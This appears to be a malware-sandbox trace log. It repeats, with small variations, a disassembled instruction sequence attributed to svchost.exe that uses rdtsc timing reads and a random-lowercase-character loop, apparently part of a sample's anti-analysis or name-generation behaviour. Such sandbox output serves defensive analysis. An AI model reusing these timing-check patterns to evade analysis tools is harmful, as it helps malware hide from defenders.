Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594B3h 0x00000031 call 2AA4FBB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA597D3h 0x00000031 call 2AA4F8F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59250h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59504h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FEB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4F7D6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59810h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59113h 0x00000031 call 2AA4F8F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59250h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FEB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA591F5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59250h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59213h 0x00000031 call 2AA4FEB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59835h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F8F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA598F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59810h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594F3h 0x00000033 call 2AA4FEB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59144h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59193h 0x00000031 call 2AA4F8F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59810h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA594F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59835h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59810h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEB6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59513h 0x00000033 call 2AA4FEB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
